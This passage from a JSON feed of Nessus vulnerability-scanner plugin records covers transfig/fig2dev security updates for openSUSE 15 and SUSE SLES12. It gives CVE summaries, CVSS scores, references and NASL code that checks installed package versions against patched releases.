value:\"2021/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'transfig-3.2.8a-bp153.3.3.2', 'cpu':'aarch64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'transfig-3.2.8a-bp153.3.3.2', 'cpu':'i586', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'transfig-3.2.8a-bp153.3.3.2', 'cpu':'s390x', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'transfig');\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:opensuse:transfig", "cpe:/o:novell:opensuse:15.3"], "solution": "Update the affected transfig package.", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2021-3561", "vpr": {"risk factor": "Medium", "score": "5.2"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-09-28T00:00:00", "vulnerabilityPublicationDate": "2019-07-26T00:00:00", "exploitableWith": [], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.nessus.NessusBulletin", "robots.models.base.Bulletin"]}, {"id": "SUSE_SU-2021-3124-1.NASL", "hash": "2bf160894bd3449ddbdc803f530a7321", "type": "nessus", "bulletinFamily": "scanner", "title": "SUSE SLES12 Security Update : transfig (SUSE-SU-2021:3124-1)", "description": "The remote SUSE Linux SLES12 host has a package installed that is affected by multiple vulnerabilities as referenced in the SUSE-SU-2021:3124-1 advisory.\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - A stack-based buffer overflow in the put_arrow() component in genpict2e.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into pict2e format.\n (CVE-2020-21680)\n\n - A global buffer overflow in the set_color component in genge.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into ge format. (CVE-2020-21681)\n\n - A global buffer overflow in the set_fill component in genge.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into ge format. (CVE-2020-21682)\n\n - A global buffer overflow in the shade_or_tint_name_after_declare_color in genpstricks.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into pstricks format.\n (CVE-2020-21683)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could allow an attacker to provide a crafted malicious input causing the application to either crash or in some cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-09-17T00:00:00", "modified": "2021-09-17T00:00:00", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.1, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/153462", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19746", "https://bugzilla.suse.com/1189325", "https://www.suse.com/security/cve/CVE-2020-21680", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21680", "https://bugzilla.suse.com/1161698", "https://www.suse.com/security/cve/CVE-2019-19555", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19797", "https://bugzilla.suse.com/1189346", "https://www.suse.com/security/cve/CVE-2020-21681", "https://bugzilla.suse.com/1189343", "https://www.suse.com/security/cve/CVE-2020-21683", "https://bugzilla.suse.com/1136882", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21681", "https://www.suse.com/security/cve/CVE-2019-19746", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21683", "https://www.suse.com/security/cve/CVE-2021-3561", "https://bugzilla.suse.com/1186329", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19555", "https://www.suse.com/security/cve/CVE-2019-19797", "https://bugzilla.suse.com/1159293", "https://bugzilla.suse.com/1159130", "http://www.nessus.org/u?550791ab", "https://bugzilla.suse.com/1189345", "https://www.suse.com/security/cve/CVE-2020-21682", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21682", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3561"], "cvelist": ["CVE-2019-19555", "CVE-2019-19746", "CVE-2019-19797", "CVE-2020-21680", "CVE-2020-21681", "CVE-2020-21682", "CVE-2020-21683", "CVE-2021-3561"], "immutableFields": [], "lastseen": "2021-09-18T13:20:01", "history": [], "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["OPENSUSE-2021-1318.NASL", "OPENSUSE-2021-2454.NASL", "DEBIAN_DLA-2778.NASL", "DEBIAN_DLA-2073.NASL", "SUSE_SU-2021-2454-1.NASL", "SUSE_SU-2021-14823-1.NASL", "AL2_ALAS-2020-1398.NASL", "OPENSUSE-2021-1143.NASL", "AL2_ALAS-2021-1682.NASL", "FEDORA_2020-6A2824178E.NASL", "FEDORA_2020-5D0F0593AE.NASL"]}, {"type": "cve", "idList": ["CVE-2020-21682", "CVE-2019-19797", "CVE-2019-19746", "CVE-2020-21683", "CVE-2020-21681", "CVE-2019-19555", "CVE-2021-3561", "CVE-2020-21680"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-3561", "UB:CVE-2019-19797", "UB:CVE-2020-21683", "UB:CVE-2019-19555", "UB:CVE-2020-21682", "UB:CVE-2020-21681", "UB:CVE-2019-19746", "UB:CVE-2020-21680"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-21683", "RH:CVE-2020-21680", "RH:CVE-2020-21681", "RH:CVE-2021-3561", "RH:CVE-2019-19746", "RH:CVE-2019-19797", "RH:CVE-2019-19555", "RH:CVE-2020-21682"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:2454-1", "OPENSUSE-SU-2021:1318-1", "OPENSUSE-SU-2021:1311-1", "OPENSUSE-SU-2021:1143-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892073", "OPENVAS:1361412562310877392", "OPENVAS:1361412562310877359", "OPENVAS:1361412562310877387", "OPENVAS:1361412562310877368"]}, {"type": "fedora", "idList": ["FEDORA:73FB862622DB", "FEDORA:20E71304CBA3", "FEDORA:B794B627F4F0", "FEDORA:E540F6253477", "FEDORA:983DF624CFF6", "FEDORA:9C4BF3072F18"]}, {"type": "amazon", "idList": ["ALAS2-2021-1682", "ALAS2-2020-1398"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC", "DEBIAN:DLA-2778-1:13AF6"]}], "modified": "2021-09-18T13:20:01", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2021-09-18T13:20:01", "rev": 2}}, "objectVersion": "1.6", "pluginID": "153462", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2021:3124-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153462);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/09/17\");\n\n script_cve_id(\n \"CVE-2019-19555\",\n \"CVE-2019-19746\",\n \"CVE-2019-19797\",\n \"CVE-2020-21680\",\n \"CVE-2020-21681\",\n \"CVE-2020-21682\",\n \"CVE-2020-21683\",\n \"CVE-2021-3561\"\n );\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2021:3124-1\");\n\n script_name(english:\"SUSE SLES12 Security Update : transfig (SUSE-SU-2021:3124-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLES12 host has a package installed that is affected by multiple vulnerabilities as referenced in\nthe SUSE-SU-2021:3124-1 advisory.\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect\n sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because\n of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - A stack-based buffer overflow in the put_arrow() component in genpict2e.c of fig2dev 3.2.7b allows\n attackers to cause a denial of service (DOS) via converting a xfig file into pict2e format.\n (CVE-2020-21680)\n\n - A global buffer overflow in the set_color component in genge.c of fig2dev 3.2.7b allows attackers to cause\n a denial of service (DOS) via converting a xfig file into ge format. (CVE-2020-21681)\n\n - A global buffer overflow in the set_fill component in genge.c of fig2dev 3.2.7b allows attackers to cause\n a denial of service (DOS) via converting a xfig file into ge format. (CVE-2020-21682)\n\n - A global buffer overflow in the shade_or_tint_name_after_declare_color in genpstricks.c of fig2dev 3.2.7b\n allows attackers to cause a denial of service (DOS) via converting a xfig file into pstricks format.\n (CVE-2020-21683)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could\n allow an attacker to provide a crafted malicious input causing the application to either crash or in some\n cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as\n system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1136882\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159130\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1161698\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186329\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1189325\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1189343\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1189345\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1189346\");\n # https://lists.suse.com/pipermail/sle-security-updates/2021-September/009457.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?550791ab\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19555\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19746\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19797\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-21680\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-21681\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-21682\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-21683\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3561\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected transfig package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLES12', 'SUSE ' + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE ' + os_ver, cpu);\n\nvar sp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3|4|5)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4/5\", os_ver + \" SP\" + sp);\n\nvar pkgs = [\n {'reference':'transfig-3.2.8a-2.17.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-12.3'},\n {'reference':'transfig-3.2.8a-2.17.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-12.4'},\n {'reference':'transfig-3.2.8a-2.17.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-12.5'},\n {'reference':'transfig-3.2.8a-2.17.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-12.2'},\n {'reference':'transfig-3.2.8a-2.17.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-12.3'},\n {'reference':'transfig-3.2.8a-2.17.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-12.3'},\n {'reference':'transfig-3.2.8a-2.17.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-12.4'},\n {'reference':'transfig-3.2.8a-2.17.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-12.5'}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (exists_check) {\n if (!rpm_exists(release:release, rpm:exists_check)) continue;\n if ('ltss' >< tolower(exists_check)) ltss_caveat_required = TRUE;\n }\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n var ltss_plugin_caveat = NULL;\n if(ltss_caveat_required) ltss_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in SUSE Enterprise Linux Server LTSS\\n' +\n 'repositories. Access to these package security updates require\\n' +\n 'a paid SUSE LTSS subscription.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + ltss_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'transfig');\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:suse_linux:transfig", "cpe:/o:novell:suse_linux:12"], "solution": "Update the affected transfig package.", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2021-3561", "vpr": {"risk factor": "Medium", "score": "5.2"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-09-16T00:00:00", "vulnerabilityPublicationDate": "2019-12-04T00:00:00", "exploitableWith": [], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.nessus.NessusBulletin", "robots.models.base.Bulletin"]}, {"id": "OPENSUSE-2021-1143.NASL", "hash": "3e4a12396b3f9bd674ba205166b5e4d6", "type": "nessus", "bulletinFamily": "scanner", "title": "openSUSE 15 Security Update : transfig (openSUSE-SU-2021:1143-1)", "description": "The remote SUSE Linux SUSE15 host has a package installed that is affected by multiple vulnerabilities as referenced in the openSUSE-SU-2021:1143-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could allow an attacker to provide a crafted malicious input causing the application to either crash or in some cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-08-11T00:00:00", "modified": "2021-08-11T00:00:00", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.1, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/152472", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.suse.com/security/cve/CVE-2019-14275", "http://www.nessus.org/u?5ffff1ea", "https://bugzilla.suse.com/1186329", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19555", "https://www.suse.com/security/cve/CVE-2019-19555", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14275", "https://www.suse.com/security/cve/CVE-2019-19797", "https://bugzilla.suse.com/1159130", "https://bugzilla.suse.com/1159293", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3561", "https://www.suse.com/security/cve/CVE-2021-3561", "https://bugzilla.suse.com/1161698", "https://bugzilla.suse.com/1143650", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19746", "https://www.suse.com/security/cve/CVE-2019-19746", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19797"], "cvelist": ["CVE-2019-14275", "CVE-2019-19555", "CVE-2019-19746", "CVE-2019-19797", "CVE-2021-3561"], "immutableFields": [], "lastseen": "2021-08-19T11:58:33", "history": [{"bulletin": {"id": "OPENSUSE-2021-1143.NASL", "hash": "dd8e21b0871359822bf75499085962a7", "type": "nessus", "bulletinFamily": "scanner", "title": "openSUSE 15 Security Update : transfig (openSUSE-SU-2021:1143-1)", "description": "The remote SUSE Linux SUSE15 host has a package installed that is affected by multiple vulnerabilities as referenced in the openSUSE-SU-2021:1143-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could allow an attacker to provide a crafted malicious input causing the application to either crash or in some cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-08-11T00:00:00", "modified": "2021-08-11T00:00:00", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.1, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/152472", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.suse.com/security/cve/CVE-2019-19797", "https://bugzilla.suse.com/1143650", "https://bugzilla.suse.com/1159130", "https://www.suse.com/security/cve/CVE-2019-19746", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3561", "https://bugzilla.suse.com/1161698", "https://www.suse.com/security/cve/CVE-2019-14275", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19797", "https://bugzilla.suse.com/1159293", "https://bugzilla.suse.com/1186329", "https://www.suse.com/security/cve/CVE-2019-19555", "https://www.suse.com/security/cve/CVE-2021-3561", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14275", "http://www.nessus.org/u?5ffff1ea", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19555", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19746"], "cvelist": ["CVE-2019-14275", "CVE-2019-19555", "CVE-2019-19746", "CVE-2019-19797", "CVE-2021-3561"], "immutableFields": [], "lastseen": "2021-08-12T11:33:48", "history": [], "viewCount": 41, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["AL2_ALAS-2020-1398.NASL", "OPENSUSE-2020-1843.NASL", "AL2_ALAS-2021-1682.NASL", "SUSE_SU-2020-1806-1.NASL", "OPENSUSE-2020-1702.NASL", "SUSE_SU-2021-2454-1.NASL", "FEDORA_2020-6A2824178E.NASL", "FEDORA_2020-5D0F0593AE.NASL", "OPENSUSE-2021-2454.NASL", "DEBIAN_DLA-2073.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:2454-1", "OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2021:1143-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-19555", "UB:CVE-2019-14275", "UB:CVE-2021-3561", "UB:CVE-2019-19797", "UB:CVE-2019-19746"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-19555", "RH:CVE-2019-14275", "RH:CVE-2021-3561", "RH:CVE-2019-19797", "RH:CVE-2019-19746"]}, {"type": "cve", "idList": ["CVE-2021-3561", "CVE-2019-14275", "CVE-2019-19555", "CVE-2019-19746", "CVE-2019-19797"]}, {"type": "fedora", "idList": ["FEDORA:E540F6253477", "FEDORA:9C4BF3072F18", "FEDORA:B794B627F4F0", "FEDORA:20E71304CBA3", "FEDORA:73FB862622DB", "FEDORA:983DF624CFF6"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892073", "OPENVAS:1361412562310877392", "OPENVAS:1361412562310877368", "OPENVAS:1361412562310877359", "OPENVAS:1361412562310877387"]}, {"type": "amazon", "idList": ["ALAS2-2020-1398", "ALAS2-2021-1682"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC"]}], "modified": "2021-08-12T11:33:48", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-08-12T11:33:48", "rev": 2}}, "objectVersion": "1.6", "pluginID": "152472", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:1143-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152472);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/11\");\n\n script_cve_id(\n \"CVE-2019-14275\",\n \"CVE-2019-19555\",\n \"CVE-2019-19746\",\n \"CVE-2019-19797\",\n \"CVE-2021-3561\"\n );\n\n script_name(english:\"openSUSE 15 Security Update : transfig (openSUSE-SU-2021:1143-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has a package installed that is affected by multiple vulnerabilities as referenced in\nthe openSUSE-SU-2021:1143-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect\n sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 